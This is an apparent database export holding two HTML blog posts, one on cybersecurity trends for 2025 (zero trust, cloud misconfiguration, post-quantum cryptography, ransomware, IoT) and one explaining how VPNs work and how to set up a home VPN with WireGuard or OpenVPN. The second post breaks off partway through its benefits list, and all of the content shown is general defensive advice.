(71, 'The Future of Cybersecurity: Trends to Watch in 2025 and Beyond', 'the-future-of-cybersecurity-trends-to-watch-in-2025-and-beyond', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital landscape continues to evolve at breakneck speed, and with it come new challenges and opportunities in cybersecurity. For IT professionals and technology enthusiasts, staying ahead of the curve isn\'t just a matter of professional development—it\'s essential for protecting businesses and individuals from increasingly sophisticated cyber threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog dives into the <b><strong class=\"font-bold\">future of cybersecurity</strong></b> by highlighting key <b><strong class=\"font-bold\">cybersecurity trends</strong></b> that are shaping how we safeguard systems, data, and infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Staying Ahead Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">2023 showcased some of the largest cyber attacks targeting supply chains, cloud systems, and SMBs (small to medium-sized businesses) in unprecedented ways. 
For those in the IT security field, preparation is no longer optional—it\'s a daily necessity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By keeping a pulse on these cybersecurity trends, IT professionals can protect sensitive information, minimize vulnerabilities, and adopt proactive measures to counteract evolving threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Top Cybersecurity Trends to Watch</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Rise of AI-Powered Cyber Threats</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Artificial intelligence (AI) isn\'t just being used for good. Cybercriminals are leveraging AI to create malware that evolves and adapts, making traditional security measures ineffective.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Trend alert</strong></b>: These \"smart\" cyber attacks can analyze patterns in IT systems and disguise themselves better than older malware types.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What IT professionals can do</strong></b>: Invest in AI-driven cybersecurity tools capable of identifying and neutralizing threats in real time.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] 
[&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Zero Trust Security Architecture</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The concept of \"trust but verify\" is shifting to <b><strong class=\"font-bold\">verify everything, trust nothing</strong></b>. This <b><strong class=\"font-bold\">zero trust</strong></b> model assumes every user, device, or system attempting to connect to a network could pose a risk.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why this matters</strong></b>: Many of the largest breaches in 2023 involved compromised credentials or insider threats. Zero trust architectures offer an additional layer of scrutiny.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Actionable next step</strong></b>: Implement strong authentications like multi-factor authentication (MFA) to secure access at all levels, including privileged accounts.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Cloud Security Takes Center Stage</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cloud adoption is increasing, but so are targeted cloud attacks. 
Misconfigured cloud settings, lack of encryption, and shared responsibility gaps with providers have put businesses at greater risk.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Trend spotlight</strong></b>: Gartner predicts that through 2025, 99% of cloud security failures will be the customer\'s fault, typically through misconfiguration rather than a flaw in the provider\'s platform.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What to do</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly audit cloud configurations, looking in particular for publicly readable storage, overly broad identity and access permissions, and network rules open to the whole internet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Train employees on shared responsibility models of cloud security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Leverage encryption tools for sensitive data stored in the cloud, and control the keys (through the provider\'s key management service or your own) so that an exposed storage bucket does not also expose readable data.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Emergence of Quantum Computing Risks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Quantum computing, while promising in revolutionizing computing power, poses a significant challenge for cryptography. 
<b><strong class=\"font-bold\">Quantum attacks</strong></b> have the potential to break the public-key algorithms (RSA, Diffie-Hellman, elliptic curves) that today\'s key exchange and digital signatures rely on; symmetric ciphers such as AES are weakened far less and remain safe with 256-bit keys.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Impact on cybersecurity</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Widely used public-key algorithms could be broken, and encrypted traffic recorded today can be decrypted later once a capable machine exists (the harvest-now, decrypt-later risk), so data that must stay secret for years is exposed first.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Companies will need <b><strong class=\"font-bold\">post-quantum cryptography (PQC)</strong></b> migration strategies, starting with an inventory of where public-key cryptography is used, before quantum computers become mainstream.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Call to action for IT professionals</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Stay updated on advancements in cryptography.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Begin exploring PQC (post-quantum cryptography) technologies, such as the NIST-standardised ML-KEM and ML-DSA algorithms, and favour hybrid deployments that keep a classical algorithm alongside the post-quantum one during the transition.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
<b><strong class=\"font-bold\">Ransomware-as-a-Service (RaaS)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware attacks are becoming easier to execute thanks to <b><strong class=\"font-bold\">Ransomware-as-a-Service</strong></b> platforms sold on the dark web. These pre-built kits lower entry barriers for wannabe hackers, making businesses of all sizes potential targets.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Notable statistic</strong></b>: According to cybersecurity reports, ransomware groups earned over $1 billion in the past year alone.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">How to mitigate the risk</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly back up critical systems and data, keep at least one copy offline or immutable so the ransomware cannot encrypt or delete it along with the originals, and test restores so you know recovery actually works.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Train employees to recognize phishing schemes often used to deploy ransomware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Update and patch exposed vulnerabilities in operating systems and software, prioritising internet-facing services such as VPN gateways and remote desktop, which are common initial entry points.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
<b><strong class=\"font-bold\">Role of IoT (Internet of Things) Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From smart thermostats to medical devices, more <b><strong class=\"font-bold\">IoT devices</strong></b> connect to the internet than ever before. However, many of these devices lack robust security measures, leaving entry points in enterprise networks vulnerable.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Future projection</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">IoT devices will surpass 75 billion by 2025.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Without proper security protocols, IoT vulnerabilities could multiply dramatically.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Essential strategies</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Use firewalls to segment IoT devices from critical systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Implement regular firmware updates for all connected devices.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] 
[&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Cybersecurity Skills Shortage and Automation Growth</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rising demand for cybersecurity professionals is outpacing supply, creating a global skills shortage. To fill this gap, businesses are turning to automation.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Future insight</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">AI tools and automated workflows are reducing the burden on IT teams by handling repetitive tasks like threat detection and log analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Advice for IT enthusiasts</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Upskilling in cybersecurity AI and automation will increase career opportunities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Businesses should combine automation with regular staff training for maximal efficiency.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Takeaways for IT Professionals</h2>\r\n<p class=\"text-body font-regular 
leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cybersecurity is both exciting and challenging. Here’s how you can be prepared:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Stay proactive</strong></b>—Threats are evolving. Adopt a mindset of continuous learning and technological adaptability.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Invest in technology</strong></b>—AI-powered defense tools and zero trust systems will be critical to staying ahead.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Collaborate</strong></b>—Cybersecurity isn’t a one-person job. Join communities, share knowledge, and stay connected with industry insights.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer just a specialized niche—it’s a driving force behind how entire businesses operate. From addressing AI-driven malware to navigating the risks of IoT and quantum computing, IT leaders and technology enthusiasts are on the frontlines of securing our increasingly digital world.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to learn more about cybersecurity or start using cutting-edge security solutions in your organization? 
Stay ahead of the curve by diving deeper into these trends.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>', '', NULL, NULL, 1, 'draft', '2025-01-17 15:05:51', '2026-01-12 21:41:44', 'Information Security', 'The Future of Cybersecurity: Trends to Watch in 2025 and Beyond', '', NULL),
(72, 'VPN Basics: Understanding How VPNs Work and Why They’re Essential for Public Networks', 'vpn-basics-understanding-how-vpns-work-and-why-theyre-essential-for-public-networks', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Technology enthusiasts and cybersecurity professionals alike recognize the importance of staying protected online. This is where Virtual Private Networks (VPNs) come into play. Whether you\'re concerned about securing your connection on public Wi-Fi or considering setting up a DIY VPN for your home, understanding how VPNs work and their critical role in network security is key.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here, we’ll explore what VPNs are, how they work, and why they’re essential, especially when connecting to public networks. Plus, we’ll show you how you can create your own VPN setup for home use!</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Is a VPN and How Does It Work?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A <b><strong class=\"font-bold\">VPN (Virtual Private Network)</strong></b> is a technology that creates a secure, encrypted connection wherever you access the Internet. Essentially, a VPN acts as a protective tunnel for your data, hiding sensitive information from prying eyes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how it works in simple steps:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">When you connect to a VPN, your device (computer, smartphone, etc.) 
connects to a server through an encrypted tunnel.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Your internet activity is funneled through this server before accessing the broader internet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Websites you visit or online services you use see the IP address of the VPN server instead of your personal IP address, offering added privacy.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> This encryption protects your traffic between your device and the VPN server, which is exactly the stretch where an attacker on an unsecured network like public Wi-Fi would be listening. Beyond the VPN server your traffic continues as it normally would, and the VPN operator itself can see it, so a VPN complements HTTPS and good account hygiene rather than replacing them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Should You Use a VPN on Public Networks?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Public Wi-Fi networks, such as those in coffee shops, airports, or libraries, might seem convenient—but they can be very risky. 
These networks are often unsecured, making them a prime target for cybercriminals.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are the top reasons why using a VPN in public networks is vital:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Protection Against Hackers</strong></b>: Without a VPN, someone on the same network can capture any unencrypted traffic with tools like packet sniffers, and can still see which sites you contact (for example through your DNS lookups) even when those sites use HTTPS. A VPN carries all of that traffic, DNS included if the client is configured to route it, past the local network.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Secure Data Encryption</strong></b>: VPNs encrypt your data between your device and the VPN server, making it unreadable to anyone intercepting it on that path.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Anonymity</strong></b>: A VPN replaces your IP address with the server\'s, hiding your location from the sites you visit and your destinations from the local network. It does not stop tracking through cookies, browser fingerprinting, or accounts you are logged in to, and the VPN provider can see your traffic, so think of this as pseudonymity rather than true anonymity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Safeguarding Sensitive Work</strong></b>: For professionals working remotely, a VPN ensures sensitive work-related data stays protected, even when using public Wi-Fi.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Can You Make Your Own VPN for Home Use?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] 
pb-[2px]\" dir=\"ltr\">Absolutely! For tech enthusiasts and cybersecurity learners, creating a home VPN can be a rewarding project. <b><strong class=\"font-bold\">Setting up a DIY VPN for home use</strong></b> allows you to control your internet privacy without relying on third-party VPN providers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how you can do it:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Choose Your VPN-Friendly Device</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You’ll need a router, a NAS (Network Attached Storage) device, or even a spare computer to act as your VPN host. Devices like Raspberry Pi are popular choices for home VPN setups.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Select and Install VPN Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are free and paid options available. 
Popular DIY choices include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">OpenVPN (a highly secure, open-source VPN protocol)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">WireGuard (a faster, more modern alternative)</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Configure and Port-Forward Your Home Router</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Forward only the VPN\'s listening port on your router so connections from outside your local network reach the VPN host, and nothing else. Authenticate clients with keys rather than a username and password: WireGuard identifies each peer by its public key, and OpenVPN should issue a certificate per client (optionally with a shared TLS auth key), with a strong passphrase protecting any private key. The VPN host is now reachable from the internet, so keep its software and the router firmware patched.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Test Your VPN</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once set up, connect to your VPN from an external device to confirm everything is working as intended. 
You now have secure remote access to your home network!</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> A home VPN is especially useful for accessing your personal files or devices remotely when you’re away from home, keeping your connection private and secure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Building Your Own Home VPN</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating your own VPN takes some effort, but it offers unique advantages:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Full Control</strong></b>: You manage the server and have complete control over how your VPN operates.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cost-Efficiency</strong></b>: Avoid recurring monthly fees from third-party providers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Enhanced Privacy</strong></b>: With your own VPN, no third-party provider sits in the middle of your traffic or holds your usage logs. Bear in mind that the sites you visit still see your home IP address and your home ISP still sees the traffic 